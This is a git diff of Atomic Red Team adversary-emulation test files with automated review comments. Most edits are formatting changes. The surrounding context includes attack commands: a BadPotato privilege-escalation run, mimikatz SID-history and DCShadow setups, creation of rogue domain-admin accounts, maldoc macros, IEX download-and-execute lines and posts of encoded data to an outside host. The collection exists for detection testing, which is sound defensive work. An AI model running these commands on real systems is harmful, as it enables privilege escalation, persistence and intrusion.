a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index 209675a0..36238b63 100644 
--- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj msbuildpath: description: Default location of MSBuild - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 msbuildname: description: Default name of MSBuild - type: Path + type: path default: msbuild.exe dependency_executor_name: powershell dependencies: @@ -43,15 +43,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127.001\src\vb.xml msbuildpath: description: Default location of MSBuild - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 msbuildname: description: Default name of MSBuild - type: Path + type: path default: msbuild.exe dependency_executor_name: powershell dependencies: @@ -65,4 +65,4 @@ atomic_tests: executor: command: | #{msbuildpath}\#{msbuildname} #(unknown) - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index eb12d932..3079fc57 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -12,15 +12,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127\src\hello.js jscpath: description: Default location of jsc.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 jscname: description: Default name of jsc - type: Path + type: path default: jsc.exe dependency_executor_name: powershell dependencies: 
@@ -51,15 +51,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127\src\LibHello.js jscpath: description: Default location of jsc.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 jscname: description: Default name of jsc - type: Path + type: path default: jsc.exe dependency_executor_name: powershell dependencies: @@ -77,4 +77,4 @@ atomic_tests: cleanup_command: | del %TEMP%\LibHello.js del %TEMP%\LibHello.dll - name: command_prompt + name: command_prompt diff --git a/atomics/T1132.001/T1132.001.yaml b/atomics/T1132.001/T1132.001.yaml index b9b8866f..d98a4476 100644 --- a/atomics/T1132.001/T1132.001.yaml +++ b/atomics/T1132.001/T1132.001.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: Url + type: url default: redcanary.com base64_data: description: Encoded data to post using fake Social Security number 111-11-1111. - type: String + type: string default: MTExLTExLTExMTE= executor: command: | @@ -32,15 +32,15 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: Url + type: url default: example.com plaintext: description: Plain text mimicking victim data sent to C2 server. - type: String + type: string default: Path\n----\nC:\Users\victim key: description: XOR key used for encoding the plaintext. - type: String + type: string default: abcdefghijklmnopqrstuvwxyz123456 executor: command: | diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index 8ffb1f5e..68f973f9 100644 --- a/atomics/T1133/T1133.yaml +++ b/atomics/T1133/T1133.yaml @@ -1,6 +1,5 @@ ---- -attack_technique: T1133 -display_name: External Remote Services +attack_technique: T1133 +display_name: External Remote Services atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension 
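Review bot: In the T1132.001 `@@ -32` hunk, `plaintext` has `default: Path\n----\nC:\Users\victim` as a plain scalar, so the `\n` sequences are literal backslash-n characters rather than newlines, while the description reads as if multi-line victim data were intended. If newlines are meant, double-quote the value (`default: "Path\n----\nC:\\Users\\victim"`) or use a block scalar; if the literal backslashes are intended, a one-line comment saying so would save the next reader the question. The hunk only lowercases `type` on the line above, so this is pre-existing and I cannot tell the intent from here.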
@@ -8,29 +7,29 @@ atomic_tests: description: | Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list supported_platforms: - - windows + - windows input_arguments: chrome_url: description: chrome installer download URL - type: Url + type: url default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe extension_id: description: chrome extension id - type: String - default: | + type: string + default: | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" dependency_executor_name: powershell - dependencies: - - description: | - Chrome must be installed - prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} - Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + dependencies: + - description: | + Chrome must be installed + prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S executor: name: powershell elevation_required: true - command: | + command: | $extList = #{extension_id} foreach ($extension in $extList) { New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force 
@@ -38,7 +37,7 @@ atomic_tests: Start chrome Start-Sleep -Seconds 30 Stop-Process -Name "chrome" - cleanup_command: | + cleanup_command: | $extList = #{extension_id} foreach ($extension in $extList) { Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index e888d95e..454f89b9 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -39,7 +39,7 @@ atomic_tests: input_arguments: nsudo_path: description: 'Path to the NSudo bat file' - type: Path + type: path default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe dependency_executor_name: powershell dependencies: @@ -54,9 +54,9 @@ atomic_tests: Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore executor: command: | - Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" - Start-Sleep -Second 5 - Stop-Process -Name "cmd" -force -erroraction silentlycontinue + Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" + Start-Sleep -Second 5 + Stop-Process -Name "cmd" -force -erroraction silentlycontinue name: powershell - name: Bad Potato auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448 @@ -66,7 +66,7 @@ atomic_tests: supported_platforms: - windows dependency_executor_name: powershell - dependencies: + dependencies: - description: | BadPotato.exe must exist in the temp directory prereq_command: | 
@@ -75,12 +75,12 @@ atomic_tests: Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" executor: command: | - cd $env:temp - Start-Process .\BadPotato.exe notepad.exe - Start-Sleep -Second 20 - Stop-Process -Name "notepad" -force -erroraction silentlycontinue - Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue + cd $env:temp + Start-Process .\BadPotato.exe notepad.exe + Start-Sleep -Second 20 + Stop-Process -Name "notepad" -force -erroraction silentlycontinue + Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue cleanup_command: | taskkill /f /im notepad.exe name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml index e05ab373..7de29473 100644 --- a/atomics/T1134.004/T1134.004.yaml +++ b/atomics/T1134.004/T1134.004.yaml @@ -14,23 +14,23 @@ atomic_tests: input_arguments: parent_process_name: description: Name of the parent process - type: String + type: string default: explorer spawnto_process_path: description: Path of the process to spawn - type: Path + type: path default: C:\Program Files\Internet Explorer\iexplore.exe dll_process_name: description: Name of the created process from the injected dll - type: String + type: string default: calculator dll_path: description: Path of the dll to inject - type: Path + type: path default: PathToAtomicsFolder\T1134.004\bin\calc.dll spawnto_process_name: description: Name of the process to spawn - type: String + type: string default: iexplore dependency_executor_name: powershell dependencies: 
@@ -65,15 +65,15 @@ atomic_tests: input_arguments: file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe parent_pid: description: PID of process to spawn from - type: String + type: string default: $PID command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. @@ -94,11 +94,11 @@ atomic_tests: input_arguments: parent_pid: description: PID of process to spawn from - type: String + type: string default: $PID test_guid: description: Defined test GUID - type: String + type: string default: 12345678-1234-1234-1234-123456789123 dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. @@ -119,11 +119,11 @@ atomic_tests: input_arguments: command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. 
@@ -144,15 +144,15 @@ atomic_tests: input_arguments: command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe parent_name: description: Parent process to spoof from - type: Path + type: path default: $Env:windir\System32\notepad.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index ae078537..20511cae 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml @@ -6,19 +6,19 @@ atomic_tests: description: | Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller supported_platforms: - - windows + - windows input_arguments: sid_to_inject: description: SID to inject into sidhistory - type: String + type: string default: S-1-5-21-1004336348-1177238915-682003330-1134 sam_account_name: description: Target account to modify - type: String + type: string default: '$env:username' mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index d5304b29..79e4e6ae 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: computer_name: description: Computer name to find a mount on. - type: String + type: string default: computer1 executor: command: | 
@@ -27,11 +27,11 @@ atomic_tests: input_arguments: package_checker: description: Package checking command. Debian - dpkg -s samba - type: String + type: string default: (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed) package_installer: description: Package installer command. Debian - apt install samba - type: String + type: string default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba) dependency_executor_name: bash dependencies: @@ -56,7 +56,7 @@ atomic_tests: input_arguments: computer_name: description: Computer name to find a mount on. - type: String + type: string default: localhost executor: command: | @@ -109,7 +109,7 @@ atomic_tests: input_arguments: parameters: description: ShareFinder parameter - type: String + type: string default: -CheckShareAccess dependencies: - description: Invoke-ShareFinder module must exist in %TEMP% directory diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index d345cd14..e076be85 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: evil_user executor: command: | @@ -28,11 +28,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: evil_user realname: description: "'realname' to record when creating the user" - type: String + type: string default: Evil Account executor: command: | @@ -56,11 +56,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_CMD password: description: Password of the user to create - type: String + type: string default: T1136.001_CMD! executor: command: | 
@@ -79,7 +79,7 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_PowerShell executor: command: | @@ -97,11 +97,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: butter password: description: Password of the user to create - type: String + type: string default: BetterWithButter executor: command: | @@ -120,11 +120,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_Admin password: description: Password of the user to create - type: String + type: string default: T1136_pass executor: command: | diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index c8a4875e..50c65c58 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.002_Admin password: description: Password of the user to create - type: String + type: string default: T1136_pass123! group: description: Domain administrator group to which add the user to - type: String + type: string default: Domain Admins executor: command: | @@ -37,11 +37,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: ANONYMOUS LOGON password: description: Password of the user to create - type: String + type: string default: T1136_pass123! executor: command: | @@ -59,11 +59,11 @@ atomic_tests: input_arguments: username: description: "Name of the Account to be created" - type: String + type: string default: T1136.002_Admin password: description: "Password of the Account to be created" - type: String + type: string default: T1136_pass123! executor: command: | 
diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml index 4083c296..8c1ecee0 100644 --- a/atomics/T1136.003/T1136.003.yaml +++ b/atomics/T1136.003/T1136.003.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: username: description: Username of the IAM user to create in AWS - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | aws iam create-user --user-name #{username} diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml index 1fa82435..8a97184d 100644 --- a/atomics/T1137.004/T1137.004.yaml +++ b/atomics/T1137.004/T1137.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1137.004 display_name: "Office Application Startup: Outlook Home Page" @@ -10,16 +9,16 @@ atomic_tests: Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). supported_platforms: - - windows + - windows input_arguments: url: description: URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) - type: String + type: string default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html outlook_version: - description: Version of Outlook that is installed - type: String + description: Version of Outlook that is installed + type: string default: 16.0 # Microsoft 365: 16.0 # Outlook 2019: 16.0 
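Review bot: The re-indented `get_prereq_command` in the T1136.003 `@@ -10` hunk still reads `defult profile`; since the line is being rewritten anyway, correct it to `default`. The `prereq_command` above it, `cat ~/.aws/credentials | grep "default"`, matches the word anywhere in the file rather than the `[default]` stanza the description names; `grep -q '^\[default\]' ~/.aws/credentials` checks the stanza itself and drops the unnecessary `cat`.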
@@ -27,7 +26,7 @@ atomic_tests: # Outlook 2013: 15.0 outlook_folder: description: Name of the Outlook folder to modify the homepage setting for - type: String + type: string default: Inbox # Default folder names as they appear in the registry: https://support.microsoft.com/en-us/office/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04 executor: diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index e4a21acc..1e4700d6 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: executable: description: name of executable - type: Path + type: path default: C:\Windows\System32\calc.exe executor: command: | @@ -30,7 +30,7 @@ atomic_tests: input_arguments: executable: description: name of executable/file to decode - type: Path + type: path default: C:\Windows\System32\calc.exe executor: command: | @@ -52,19 +52,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - Python must be present - prereq_command: | - which python3 - get_prereq_command: | - echo "Please install Python 3" + - description: | + Python must be present + prereq_command: | + which python3 + get_prereq_command: | + echo "Please install Python 3" executor: name: sh elevation_required: false 
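Review bot: The `prereq_command` in the T1140 `@@ -52` hunk uses `which python3` under the `sh` executor; `which` is not POSIX and its exit status varies across implementations, so the prerequisite check may not report reliably. `command -v python3 >/dev/null 2>&1` is the portable form and exits non-zero when the tool is absent. The same pattern is re-indented in the `@@ -86` (`which perl`) and `@@ -146` (`which xxd`) hunks of this file.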
@@ -86,19 +86,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - Perl must be present - prereq_command: | - which perl - get_prereq_command: | - echo "Please install Perl" + - description: | + Perl must be present + prereq_command: | + which perl + get_prereq_command: | + echo "Please install Perl" executor: name: sh elevation_required: false @@ -117,11 +117,11 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded executor: name: sh @@ -146,19 +146,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - xxd must be present - prereq_command: | - which xxd - get_prereq_command: | - echo "Please install xxd" + - description: | + xxd must be present + prereq_command: | + which xxd + get_prereq_command: | + echo "Please install xxd" executor: name: sh elevation_required: false diff --git a/atomics/T1195/T1195.yaml b/atomics/T1195/T1195.yaml index 3ec38e64..9ccd05e8 100644 --- a/atomics/T1195/T1195.yaml +++ b/atomics/T1195/T1195.yaml @@ -1,5 +1,5 @@ attack_technique: T1195 -display_name: Supply Chain Compromise +display_name: Supply Chain Compromise atomic_tests: - name: Octopus Scanner Malware Open Source Supply Chain auto_generated_guid: 82a9f001-94c5-495e-9ed5-f530dbded5e2 
@@ -12,7 +12,7 @@ atomic_tests: input_arguments: rat_payload: description: RAT dropper ExplorerSync.db - type: Path + type: path default: $env:TEMP\ExplorerSync.db dependency_executor_name: powershell dependencies: diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 004bc970..70fa8ff8 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file - type: Path + type: path default: '%temp%\bitsadmin1_flag.ps1' executor: command: | @@ -35,11 +35,11 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file - type: Path + type: path default: $env:TEMP\bitsadmin2_flag.ps1 executor: command: | @@ -59,19 +59,19 @@ atomic_tests: input_arguments: command_path: description: Path of command to execute - type: Path + type: path default: C:\Windows\system32\notepad.exe bits_job_name: description: Name of BITS job - type: String + type: string default: AtomicBITS local_file: description: Local file path to save downloaded file - type: Path + type: path default: '%temp%\bitsadmin3_flag.ps1' remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md executor: command: | 
@@ -96,19 +96,19 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md download_path: description: Local file path to save downloaded file - type: Path + type: path default: 'SYSTEMROOT=C:\Windows\Temp' cleanup_path: description: path to delete file as part of cleanup_command - type: Path + type: path default: C:\Windows\Temp\Personalization\LockScreenImage cleanup_file: description: file to remove as part of cleanup_command - type: String + type: string default: "*.md" executor: command: | diff --git a/atomics/T1202/T1202.yaml b/atomics/T1202/T1202.yaml index b3597f6d..79bf2947 100644 --- a/atomics/T1202/T1202.yaml +++ b/atomics/T1202/T1202.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: payload_path: description: Path to payload - type: Path + type: path default: C:\Windows\System32\calc.exe process: description: Process to execute - type: String + type: string default: calc.exe executor: command: | @@ -35,7 +35,7 @@ atomic_tests: input_arguments: process: description: Process to execute - type: String + type: string default: calc.exe executor: command: | @@ -52,7 +52,7 @@ atomic_tests: input_arguments: process: description: Process to execute - type: String + type: string default: notepad.exe executor: command: | diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 4b721a6e..31b531bb 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -15,11 +15,11 @@ atomic_tests: jse_path: description: | Path for the macro to write out the "malicious" .jse file - type: String + type: string default: C:\Users\Public\art.jse ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: 
@@ -52,11 +52,11 @@ atomic_tests: input_arguments: script_file: description: File to execute jscript code from - type: Path + type: path default: '%TEMP%\OSTapGet.js' file_url: description: URL to retrieve file from - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | @@ -75,7 +75,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -107,11 +107,11 @@ atomic_tests: input_arguments: jse_path: description: jse file to execute with wscript - type: Path + type: path default: C:\Users\Public\art.jse ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -133,7 +133,7 @@ atomic_tests: $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell - + - name: Office launching .bat file from AppData auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. @@ -142,11 +142,11 @@ atomic_tests: input_arguments: bat_path: description: Path to malicious .bat file - type: String + type: string default: $("$env:temp\art1204.bat") ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: 
@@ -182,11 +182,11 @@ atomic_tests: input_arguments: download_url: description: Download URL - type: String + type: string default: "https://live.sysinternals.com/procexp.exe" uname: description: Username for pathing - type: String + type: string default: $env:Username dependency_executor_name: powershell dependencies: @@ -289,9 +289,9 @@ atomic_tests: Write-Host "You will need to install Google Chrome manually to meet this requirement" executor: command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) - Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell cleanup_command: | Stop-Process -name mshta 
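Review bot: `download_url` in the T1204.002 `@@ -182` hunk is typed `string` although its description is "Download URL" and its default is an `https://` address; elsewhere in this diff URL-valued arguments are typed `url` (T1197 `remote_file`, T1132.001 `destination_url`, and `pua_url` later in this same file). `type: url` keeps the argument schema consistent, assuming the consumer accepts it for this argument as it does for the others.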
@@ -300,15 +300,15 @@ atomic_tests: description: | The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). supported_platforms: - - windows + - windows input_arguments: pua_url: description: url to PotentiallyUnwanted.exe - type: Url + type: url default: "http://amtso.eicar.org/PotentiallyUnwanted.exe" pua_file: description: path to PotentiallyUnwanted.exe - type: Path + type: path default: "$env:TEMP/PotentiallyUnwanted.exe" executor: name: powershell 
@@ -328,55 +328,55 @@ atomic_tests: Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt supported_platforms: - - windows + - windows input_arguments: macro_path: description: | Location of file which will be converted to a VBA macro - type: Path + type: path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: | This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - type: Url - default: null + type: url + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. Will default to root directory. Forward slashes are not needed at begining or ending of directory path - type: Path + type: path default: "" file_name: description: | "Malicious" file to be downloaded. This required file needs to be place on the user provided c2 domain Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt - type: String + type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt ms_product: description: | Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: - - description: | - Destination c2_domain name or IP address must be set to a running HTTP server. 
- prereq_command: | - if (#{c2_domain}) (exit 0) else (exit 1) - get_prereq_command: | - Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - - description: | - Microsoftt #{ms_product} must be installed - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: | - Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" + - description: | + Destination c2_domain name or IP address must be set to a running HTTP server. + prereq_command: | + if (#{c2_domain}) (exit 0) else (exit 1) + get_prereq_command: | + Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" + - description: | + Microsoftt #{ms_product} must be installed + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: name: powershell command: | 
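Review bot: The c2_domain prerequisite on the new side, `if (#{c2_domain}) (exit 0) else (exit 1)`, is not valid PowerShell for a `dependency_executor_name: powershell` block: `if` requires a `{ }` statement block, and with the bare empty `default:` the substitution yields `if ()`, which also fails to parse. Suggest `if ("#{c2_domain}") {exit 0} else {exit 1}` so an unset value evaluates false and a provided value passes. Replacing `default: null` with a bare `default:` parses to the same null but is the ambiguous form yamllint's empty-values rule flags; keep `default: null` (or `default: ""`) explicit. The second dependency's description also carries a typo, `Microsoftt #{ms_product} must be installed`.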
@@ -390,11 +390,9 @@ atomic_tests: Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - name: LNK Payload Download auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f - description: - This lnk files invokes powershell to download putty from the internet and opens the file. - https://twitter.com/ankit_anubhav/status/1518932941090410496 + description: This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496 supported_platforms: - - windows + - windows executor: command: | Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk" @@ -422,4 +420,3 @@ atomic_tests: & '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f name: powershell - diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index d49c8a0d..b78285c7 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -19,23 +19,23 @@ atomic_tests: input_arguments: object: description: Targeted object (for machine account do not forget to add final '$') - type: String + type: string default: bruce.wayne attribute: description: "Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory..." - type: String + type: string default: badpwdcount value: description: Value to assign to object attribute - type: String + type: string default: "9999" mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec - type: Path + type: 